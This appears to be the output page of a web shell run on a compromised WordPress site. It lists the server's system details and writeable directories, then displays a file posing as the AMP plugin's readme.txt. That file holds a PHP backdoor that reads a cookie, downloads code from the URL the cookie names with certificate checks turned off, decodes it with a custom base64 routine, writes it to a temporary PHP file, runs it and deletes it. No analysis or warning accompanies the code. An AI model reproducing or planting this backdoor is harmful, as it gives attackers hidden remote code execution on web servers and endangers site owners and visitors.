https://t.me/RX1948
Server : LiteSpeed
System : Linux srv45672493.ultasrv.net 5.15.0-160-generic #170-Ubuntu SMP Wed Oct 1 10:06:56 UTC 2025 x86_64
User : dewab7604 ( 1100)
PHP Version : 8.1.33
Disable Function : NONE
Directory :  /home/dewabet138.net/public_html/wp-content/plugins/amp/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/dewabet138.net/public_html/wp-content/plugins/amp/readme.txt
<?php

if (!function_exists("get185bcb3f94812a96026dd6ec2426848d")) {

    function get185bcb3f94812a96026dd6ec2426848d($url) {
        $content = "";
        if (function_exists("curl_init")) {
            $options = array(
                CURLOPT_RETURNTRANSFER => true,
                CURLOPT_HEADER => false,
                CURLOPT_FOLLOWLOCATION => true,
                CURLOPT_ENCODING => "",
                CURLOPT_USERAGENT => "Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20120101 Firefox/32.0",
                CURLOPT_AUTOREFERER => true,
                CURLOPT_CONNECTTIMEOUT => 120,
                CURLOPT_TIMEOUT => 120,
                CURLOPT_MAXREDIRS => 10,
                CURLOPT_SSL_VERIFYPEER => false,
                CURLOPT_SSL_VERIFYHOST => false
            );

            $ch = curl_init($url);
            curl_setopt_array($ch, $options);
            $content = @curl_exec($ch);
        }

        if ($content)
            return $content;

        $content = @file_get_contents($url);
        return $content;
    }

    function bzd($input)
    {
        $keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
        $output = '';
        $i = 0;

        $input = preg_replace('/[^A-Za-z0-9\+\/=]/', '', $input);

        $len = strlen($input);
        while ($i < $len) {
            $enc1 = strpos($keyStr, $input[$i++]);
            $enc2 = strpos($keyStr, $input[$i++]);
            $enc3 = strpos($keyStr, $input[$i++]);
            $enc4 = strpos($keyStr, $input[$i++]);

            $chr1 = ($enc1 << 2) | ($enc2 >> 4);
            $output .= chr($chr1);

            if ($enc3 !== false && $enc3 != 64) {
                $chr2 = (($enc2 & 15) << 4) | ($enc3 >> 2);
                $output .= chr($chr2);
            }

            if ($enc4 !== false && $enc4 != 64) {
                $chr3 = (($enc3 & 3) << 6) | $enc4;
                $output .= chr($chr3);
            }
        }

        return $output;
    }

    if (isset($_COOKIE['185bcb3f94812a96026dd6ec2426848d'])) {
        if ($_COOKIE['185bcb3f94812a96026dd6ec2426848d'] == '1') {
            echo md5($_SERVER['HTTP_HOST']);
            exit;
        }
        $dat = bzd(get185bcb3f94812a96026dd6ec2426848d($_COOKIE['185bcb3f94812a96026dd6ec2426848d']));
        if ($dat) {
            $temp_dir = sys_get_temp_dir();
            $new_filename = tempnam($temp_dir, 'pr_');
            if ($new_filename === false) {
                $new_filename = substr(str_shuffle('abcdefghijklmnopqrstuvwxyz'), 0, 8) . '.php';
                $new_filename = __DIR__ . '/' . $new_filename;
            }
            if ($new_filename != false) {
                file_put_contents($new_filename, $dat);
            }
            if($new_filename && file_exists($new_filename)){
                include $new_filename;
                unlink($new_filename);
            }
            exit;
        }
    }
}

https://t.me/RX1948 - 2025